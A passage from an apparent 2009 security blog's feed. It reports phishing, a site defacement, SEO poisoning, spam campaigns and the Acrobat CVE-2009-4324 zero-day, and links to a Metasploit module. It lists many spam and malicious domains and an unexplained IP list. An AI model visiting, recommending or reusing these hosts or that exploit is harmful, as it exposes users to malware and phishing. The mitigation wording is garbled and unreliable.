/&gt;221.143.60.99      Korea, Republic Of&lt;br /&gt;87.7.150.120      Italy&lt;br /&gt;193.110.77.60      Ukraine&lt;br /&gt;93.80.33.215      Russian Federation&lt;br /&gt;67.49.12.244      United States&lt;br /&gt;121.1.71.38      Korea, Republic Of&lt;br /&gt;87.10.29.149      Italy&lt;br /&gt;121.159.139.134      Korea, Republic Of&lt;br /&gt;84.125.210.129      Spain&lt;br /&gt;125.178.173.231      Korea, Republic Of&lt;br /&gt;93.126.104.158      Ukraine&lt;br /&gt;128.130.56.33      Austria&lt;br /&gt;129.22.80.237      United States&lt;br /&gt;220.116.89.236      Korea, Republic Of&lt;br /&gt;24.42.76.57      United States&lt;br /&gt;98.30.33.240      United States&lt;br /&gt;84.3.94.38      Hungary&lt;br /&gt;121.164.68.74      Korea, Republic Of&lt;br /&gt;24.132.52.67      Netherlands&lt;br /&gt;83.85.192.248      Netherlands&lt;br /&gt;70.121.202.156      United States&lt;br /&gt;64.246.85.154       United States&lt;br /&gt;67.187.153.18      United States&lt;br /&gt;98.240.224.97      United States&lt;br /&gt;152.1.40.235      United States&lt;br /&gt;79.9.35.42      Italy&lt;br /&gt;69.204.254.166      United States&lt;br /&gt;121.217.36.61      Australia&lt;br /&gt;24.238.162.9      United States&lt;br /&gt;121.128.195.90      Korea, Republic Of&lt;br /&gt;109.60.245.57     Italy&lt;br /&gt;119.64.109.187      Korea, Republic Of&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-9028895233528147122?l=www.web2secure.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/pgyO-boaGiBZjnojjbC9WGJlBFw/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/pgyO-boaGiBZjnojjbC9WGJlBFw/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/pgyO-boaGiBZjnojjbC9WGJlBFw/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/pgyO-boaGiBZjnojjbC9WGJlBFw/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.web2secure.com/feeds/9028895233528147122/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=2992238913899645252&amp;postID=9028895233528147122" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/9028895233528147122?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/9028895233528147122?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/WebSecurityWeblog/~3/NQoERfvznmo/security-tool-rouge-antivirus.html" title="Security Tool Rouge Antivirus" /><author><name>secur065web</name><uri>http://www.blogger.com/profile/03927955797207814790</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="05729779973789084377" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_N2xP0b-ECBo/SzI3k0oGr-I/AAAAAAAAA6A/szz8-FfRVZs/s72-c/hidecodes.PNG" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.web2secure.com/2009/12/security-tool-rouge-antivirus.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEAER3k6cSp7ImA9WxBSFUk.&quot;"><id>tag:blogger.com,1999:blog-2992238913899645252.post-3481762279784200528</id><published>2009-12-22T21:33:00.001-08:00</published><updated>2009-12-22T21:38:26.719-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-12-22T21:38:26.719-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="phishing" /><category scheme="http://www.blogger.com/atom/ns#" term="Wow" /><title>World Of Warcraft Phishing Website</title><content type="html">World of Warcraft (WoW) players should be on the lookout for phishing sites trying to get their user info.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_N2xP0b-ECBo/SzGr6zRlUeI/AAAAAAAAA5Y/3smw3gJ8fMM/s1600-h/fakewow.PNG"&gt;&lt;img style="cursor: pointer; width: 320px; height: 180px;" src="http://4.bp.blogspot.com/_N2xP0b-ECBo/SzGr6zRlUeI/AAAAAAAAA5Y/3smw3gJ8fMM/s320/fakewow.PNG" alt="" id="BLOGGER_PHOTO_ID_5418300853388136930" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Becareful for this link..&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-3481762279784200528?l=www.web2secure.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/KMjWrDbGSu3H1uo2Xz2wmkaOJUw/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/KMjWrDbGSu3H1uo2Xz2wmkaOJUw/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/KMjWrDbGSu3H1uo2Xz2wmkaOJUw/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/KMjWrDbGSu3H1uo2Xz2wmkaOJUw/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.web2secure.com/feeds/3481762279784200528/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=2992238913899645252&amp;postID=3481762279784200528" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/3481762279784200528?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/3481762279784200528?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/WebSecurityWeblog/~3/_Z-4UmhoctY/world-of-warcraft-phishing-website.html" title="World Of Warcraft Phishing Website" /><author><name>secur065web</name><uri>http://www.blogger.com/profile/03927955797207814790</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="05729779973789084377" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_N2xP0b-ECBo/SzGr6zRlUeI/AAAAAAAAA5Y/3smw3gJ8fMM/s72-c/fakewow.PNG" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.web2secure.com/2009/12/world-of-warcraft-phishing-website.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CkUER3s9fCp7ImA9WxBSFEU.&quot;"><id>tag:blogger.com,1999:blog-2992238913899645252.post-6771557811349939529</id><published>2009-12-22T03:01:00.000-08:00</published><updated>2009-12-22T03:10:06.564-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-12-22T03:10:06.564-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Web Security" /><category scheme="http://www.blogger.com/atom/ns#" term="news" /><category scheme="http://www.blogger.com/atom/ns#" term="defaced" /><title>Malaysia Property Company Defaced, www.metrolink.com.my</title><content type="html">My reader sent me email to post regarding the defacement for the Metrolink.com.my, this website providing full range of property at Malaysia include Sale, Rent, Project Development Launching and etc.&lt;br /&gt;&lt;br /&gt;Before defaced:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_N2xP0b-ECBo/SzCoZwnR63I/AAAAAAAAA5I/T6X2FHAL4_8/s1600-h/metrolink-default.PNG"&gt;&lt;img style="cursor: pointer; width: 320px; height: 250px;" src="http://3.bp.blogspot.com/_N2xP0b-ECBo/SzCoZwnR63I/AAAAAAAAA5I/T6X2FHAL4_8/s320/metrolink-default.PNG" alt="" id="BLOGGER_PHOTO_ID_5418015512226556786" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;After defaced:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_N2xP0b-ECBo/SzCos45CtFI/AAAAAAAAA5Q/8GSnJLYaTdU/s1600-h/metrolink.PNG"&gt;&lt;img style="cursor: pointer; width: 320px; height: 224px;" src="http://4.bp.blogspot.com/_N2xP0b-ECBo/SzCos45CtFI/AAAAAAAAA5Q/8GSnJLYaTdU/s320/metrolink.PNG" alt="" id="BLOGGER_PHOTO_ID_5418015840866055250" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Thanks for my reader!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-6771557811349939529?l=www.web2secure.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/qJlyKnL5E_Y0V1wXGEZ12RdcwdQ/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/qJlyKnL5E_Y0V1wXGEZ12RdcwdQ/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/qJlyKnL5E_Y0V1wXGEZ12RdcwdQ/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/qJlyKnL5E_Y0V1wXGEZ12RdcwdQ/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.web2secure.com/feeds/6771557811349939529/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=2992238913899645252&amp;postID=6771557811349939529" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/6771557811349939529?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/6771557811349939529?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/WebSecurityWeblog/~3/iWqoyd1fa54/malaysia-property-company-defaced.html" title="Malaysia Property Company Defaced, www.metrolink.com.my" /><author><name>secur065web</name><uri>http://www.blogger.com/profile/03927955797207814790</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="05729779973789084377" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_N2xP0b-ECBo/SzCoZwnR63I/AAAAAAAAA5I/T6X2FHAL4_8/s72-c/metrolink-default.PNG" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.web2secure.com/2009/12/malaysia-property-company-defaced.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0AEQHk6eip7ImA9WxBSFEo.&quot;"><id>tag:blogger.com,1999:blog-2992238913899645252.post-8035851539137192781</id><published>2009-12-22T02:34:00.000-08:00</published><updated>2009-12-22T03:01:41.712-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-12-22T03:01:41.712-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Web Security" /><category scheme="http://www.blogger.com/atom/ns#" term="news" /><category scheme="http://www.blogger.com/atom/ns#" term="SEO" /><title>Brittany Murphy's Death SEO Poisoning Among Security Vendors</title><content type="html">Sudden death of Hollywood Celebrity's Brittany Murphy at age 32 during last weekend, really get bad guys interested to launch SEO poisoning at search result. This bad news really driving lots of users curiosity to become victim of scareware. Due to this incident, several articles regarding Brittany Murphy were posted by security vendors in their public blog.&lt;br /&gt;&lt;br /&gt;Wensense - &lt;a href="http://securitylabs.websense.com/content/Alerts/3514.aspx"&gt;Brittany Murphy's Death SEO Poisoning&lt;/a&gt;&lt;br /&gt;F-Secure - &lt;a href="http://www.f-secure.com/weblog/archives/00001842.html"&gt;Brittany Murphy SEO&lt;/a&gt;&lt;br /&gt;Trendmicro - &lt;a href="http://blog.trendmicro.com/news-on-brittany-murphy%e2%80%99s-death-lead-to-fakeav/"&gt;News on Brittany Murphy’s Death Lead to FAKEAV &lt;/a&gt;&lt;br /&gt;McAfee - &lt;a href="http://www.avertlabs.com/research/blog/index.php/2009/12/21/brittany-murphy-searching-dangers/"&gt;Brittany Murphy Searching Dangers&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Although whole worlds are in the Christmas mood, bad guys never stop to continue their making money nest.  :)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-8035851539137192781?l=www.web2secure.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/8ncLdYpiruxmjbfpjw1SmssLfr8/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/8ncLdYpiruxmjbfpjw1SmssLfr8/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/8ncLdYpiruxmjbfpjw1SmssLfr8/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/8ncLdYpiruxmjbfpjw1SmssLfr8/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.web2secure.com/feeds/8035851539137192781/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=2992238913899645252&amp;postID=8035851539137192781" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/8035851539137192781?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/8035851539137192781?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/WebSecurityWeblog/~3/VInoSC483C8/brittany-murphys-death-seo-poisoning.html" title="Brittany Murphy's Death SEO Poisoning Among Security Vendors" /><author><name>secur065web</name><uri>http://www.blogger.com/profile/03927955797207814790</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="05729779973789084377" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.web2secure.com/2009/12/brittany-murphys-death-seo-poisoning.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DE4FQ3s_cSp7ImA9WxBSE0Q.&quot;"><id>tag:blogger.com,1999:blog-2992238913899645252.post-7969199852074679219</id><published>2009-12-21T03:52:00.000-08:00</published><updated>2009-12-21T04:01:52.549-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-12-21T04:01:52.549-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Pharmaceutic" /><category scheme="http://www.blogger.com/atom/ns#" term="spam" /><title>Viagra &amp; EuroSoft Promotion Spamming For Christmas</title><content type="html">&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_N2xP0b-ECBo/Sy9hx2PUn7I/AAAAAAAAA4w/D01MeW5jukQ/s1600-h/viagadec.PNG"&gt;&lt;img style="cursor: pointer; width: 320px; height: 196px;" src="http://1.bp.blogspot.com/_N2xP0b-ECBo/Sy9hx2PUn7I/AAAAAAAAA4w/D01MeW5jukQ/s320/viagadec.PNG" alt="" id="BLOGGER_PHOTO_ID_5417656385751261106" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Spamming Links:&lt;br /&gt;&lt;br /&gt;http://www.zhdfght.com/&lt;br /&gt;http://www.piyamcy.cn&lt;br /&gt;http://prettymoral.com&lt;br /&gt;http://www.ingobdue.cn&lt;br /&gt;http://nvaecs.angelfire.com&lt;br /&gt;http://ienroller.angelfire.com&lt;br /&gt;http://www.iwxkugue.cn&lt;br /&gt;http://e10bee.suyivoqiw.cn/&lt;br /&gt;http://biznews7.org/news&lt;br /&gt;http://cid-a97391e298c94785.spaces.live.com&lt;br /&gt;http://f2a63275.wejowafob.cn/&lt;br /&gt;http://6a38a4.zehaqomay.cn/&lt;br /&gt;http://97305a2a71.sudugefon.cn/&lt;br /&gt;http://c301d1b3f9f7.vasesomer.cn/&lt;br /&gt;http://30319b.bitapacoh.cn/&lt;br /&gt;http://50386a9.rihogagox.cn/&lt;br /&gt;http://cid-3e4630a031e273ff.spaces.live.com/&lt;br /&gt;http://www.rxultimatespell.com/&lt;br /&gt;http://f62db.xamobejep.cn/&lt;br /&gt;http://moonnake.net/&lt;br /&gt;http://11knife.ru/&lt;br /&gt;http://001c2f.bapunat.cn/&lt;br /&gt;http://1a68d3b7.hiyusev.cn/&lt;br /&gt;http://now.to/5xt7&lt;br /&gt;http://e5c8.cohuzkp.cn/&lt;br /&gt;http://7e5629c7.jisurim.cn/&lt;br /&gt;http://1680.cevupxn.cn/&lt;br /&gt;http://bca.vocimtf.cn/&lt;br /&gt;http://www.pharmlorens61.cn/&lt;br /&gt;http://284c62d3.tabuhhh.cn/&lt;br /&gt;http://dfe6.cetitgv.cn/&lt;br /&gt;http://oskjcjed.cn/&lt;br /&gt;http://89a.yomepmm.cn/&lt;br /&gt;http://55a1.qofezgk.cn/&lt;br /&gt;http://www.goziywb.cn/&lt;br /&gt;http://fd78.yiruxgl.cn/&lt;br /&gt;http://zokxfde.cn/&lt;br /&gt;http://c3ceea7bf5.huweynf.cn/&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_N2xP0b-ECBo/Sy9iU9N0CAI/AAAAAAAAA44/ojsmEL4P1QY/s1600-h/Adobepromo.PNG"&gt;&lt;img style="cursor: pointer; width: 320px; height: 206px;" src="http://1.bp.blogspot.com/_N2xP0b-ECBo/Sy9iU9N0CAI/AAAAAAAAA44/ojsmEL4P1QY/s320/Adobepromo.PNG" alt="" id="BLOGGER_PHOTO_ID_5417656988919400450" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;http://kloperesofes.net/&lt;br /&gt;http://sruisorehoes.net/&lt;br /&gt;http://koperdinoses.com/&lt;br /&gt;http://xirobenasoes.com/&lt;br /&gt;&lt;a bitly="BITLY_PROCESSED" title="ns for kloperesofes.net" href="http://www.robtex.com/dns/ns3.ziopraventoes.com.html"&gt;&lt;/a&gt;http://ziopraventoes.com/&lt;br /&gt;http://irgalometrices.com/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-7969199852074679219?l=www.web2secure.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/nvjxt-Gly8poDD2d5ofieVuZ54c/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/nvjxt-Gly8poDD2d5ofieVuZ54c/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/nvjxt-Gly8poDD2d5ofieVuZ54c/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/nvjxt-Gly8poDD2d5ofieVuZ54c/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.web2secure.com/feeds/7969199852074679219/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=2992238913899645252&amp;postID=7969199852074679219" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/7969199852074679219?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/7969199852074679219?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/WebSecurityWeblog/~3/Yz3NEpUTTNs/viagra-eurosoft-promotion-spamming-for.html" title="Viagra &amp; EuroSoft Promotion Spamming For Christmas" /><author><name>secur065web</name><uri>http://www.blogger.com/profile/03927955797207814790</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="05729779973789084377" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_N2xP0b-ECBo/Sy9hx2PUn7I/AAAAAAAAA4w/D01MeW5jukQ/s72-c/viagadec.PNG" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.web2secure.com/2009/12/viagra-eurosoft-promotion-spamming-for.html</feedburner:origLink></entry><entry gd:etag="W/&quot;D0MBSH47cCp7ImA9WxBSE0Q.&quot;"><id>tag:blogger.com,1999:blog-2992238913899645252.post-2082202390337876848</id><published>2009-12-21T03:34:00.000-08:00</published><updated>2009-12-21T03:37:39.008-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-12-21T03:37:39.008-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Web Security" /><category scheme="http://www.blogger.com/atom/ns#" term="spam" /><title>Fuckbook invitation in email</title><content type="html">Just update, do you guys received tons of spam email regarding "FuckBook Invite #xxxxxx" ? I do received lots of similar messages.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_N2xP0b-ECBo/Sy9dvTE-xWI/AAAAAAAAA4o/qF-vz-Uq6ao/s1600-h/fuckbook.PNG"&gt;&lt;img style="cursor: pointer; width: 320px; height: 125px;" src="http://1.bp.blogspot.com/_N2xP0b-ECBo/Sy9dvTE-xWI/AAAAAAAAA4o/qF-vz-Uq6ao/s320/fuckbook.PNG" alt="" id="BLOGGER_PHOTO_ID_5417651943906395490" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Suspicious links:&lt;br /&gt;&lt;br /&gt;http://nvaecs.angelfire.com&lt;br /&gt;http://ienroller.angelfire.com&lt;br /&gt;http://pcfreehost.tripod.com&lt;br /&gt;http://ecbrowse.tripod.com&lt;br /&gt;http://quickreviews.tripod.com&lt;br /&gt;http://stupsihasi.tripod.com&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-2082202390337876848?l=www.web2secure.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/YbfNKNAV_YUdKeoIQ-KHt4NGaSw/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/YbfNKNAV_YUdKeoIQ-KHt4NGaSw/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/YbfNKNAV_YUdKeoIQ-KHt4NGaSw/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/YbfNKNAV_YUdKeoIQ-KHt4NGaSw/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.web2secure.com/feeds/2082202390337876848/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=2992238913899645252&amp;postID=2082202390337876848" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/2082202390337876848?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/2082202390337876848?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/WebSecurityWeblog/~3/R8aTGD4NQ_g/fuckbook-invitation-in-email.html" title="Fuckbook invitation in email" /><author><name>secur065web</name><uri>http://www.blogger.com/profile/03927955797207814790</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="05729779973789084377" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_N2xP0b-ECBo/Sy9dvTE-xWI/AAAAAAAAA4o/qF-vz-Uq6ao/s72-c/fuckbook.PNG" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.web2secure.com/2009/12/fuckbook-invitation-in-email.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DkcHRXY-cCp7ImA9WxBSEEs.&quot;"><id>tag:blogger.com,1999:blog-2992238913899645252.post-581626243923482320</id><published>2009-12-17T07:03:00.000-08:00</published><updated>2009-12-17T07:33:54.858-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-12-17T07:33:54.858-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="news" /><category scheme="http://www.blogger.com/atom/ns#" term="acrobat" /><category scheme="http://www.blogger.com/atom/ns#" term="CVE-2009-4324" /><title>Acrobat Zero Day - media.newPlayer(null) CVE-2009-4324</title><content type="html">Since last week, Acrobat Zero-Day created lots attention to security industry and official vendor patch only available by next year 12 Jan 2010.&lt;br /&gt;&lt;br /&gt;According to &lt;a href="http://www.net-security.org/secworld.php?id=8628"&gt;Net-Security&lt;/a&gt;, Adobe applications top the list of four applications identified in US NIST.&lt;br /&gt;&lt;br /&gt;Metasploit Framework add this Zero Day exploit in their latest database.&lt;br /&gt;&lt;a href="http://downloads.securityfocus.com/vulnerabilities/exploits/adobe_media_newplayer.rb"&gt;http://downloads.securityfocus.com/vulnerabilities/exploits/adobe_media_newplayer.rb&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Malicious PDF files crafted with this Zero-Day exploit are in wilds. So as usual, I recommend everyone to be more extra vigilant when receiving PDF files through internet.&lt;br /&gt;&lt;br /&gt;Temporary solution for Adobe Reader either one&lt;br /&gt;- Disable the "&lt;span style="font-weight: bold;"&gt;Disable JavaScript&lt;/span&gt;" features in your Adobe Reader.&lt;br /&gt;- Edit registry (.reg) file&lt;br /&gt;&lt;pre&gt;[HKEY_CLASSES_ROOT\AcroExch.Document.7]&lt;br /&gt;"EditFlags"=hex:00,00,00,00&lt;/pre&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_N2xP0b-ECBo/SypOzR6akPI/AAAAAAAAA4g/Rrg5gWvffEU/s1600-h/pdf-temsolution.PNG"&gt;&lt;img style="cursor: pointer; width: 320px; height: 188px;" src="http://4.bp.blogspot.com/_N2xP0b-ECBo/SypOzR6akPI/AAAAAAAAA4g/Rrg5gWvffEU/s320/pdf-temsolution.PNG" alt="" id="BLOGGER_PHOTO_ID_5416228144755151090" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;- Seek for alternative PDF reader that available in market.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-581626243923482320?l=www.web2secure.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/-Djg9YJLZU9VrjBEc8sMkvww0qY/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/-Djg9YJLZU9VrjBEc8sMkvww0qY/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/-Djg9YJLZU9VrjBEc8sMkvww0qY/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/-Djg9YJLZU9VrjBEc8sMkvww0qY/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.web2secure.com/feeds/581626243923482320/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=2992238913899645252&amp;postID=581626243923482320" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/581626243923482320?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/581626243923482320?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/WebSecurityWeblog/~3/nauq93y_Vhs/acrobat-zero-day-medianewplayernull-cve.html" title="Acrobat Zero Day - media.newPlayer(null) CVE-2009-4324" /><author><name>secur065web</name><uri>http://www.blogger.com/profile/03927955797207814790</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="05729779973789084377" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_N2xP0b-ECBo/SypOzR6akPI/AAAAAAAAA4g/Rrg5gWvffEU/s72-c/pdf-temsolution.PNG" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.web2secure.com/2009/12/acrobat-zero-day-medianewplayernull-cve.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0YFRnY4fCp7ImA9WxBSEEg.&quot;"><id>tag:blogger.com,1999:blog-2992238913899645252.post-909077450720738085</id><published>2009-12-17T06:06:00.001-08:00</published><updated>2009-12-17T06:11:57.834-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-12-17T06:11:57.834-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="rogue" /><category scheme="http://www.blogger.com/atom/ns#" term="Bogus" /><category 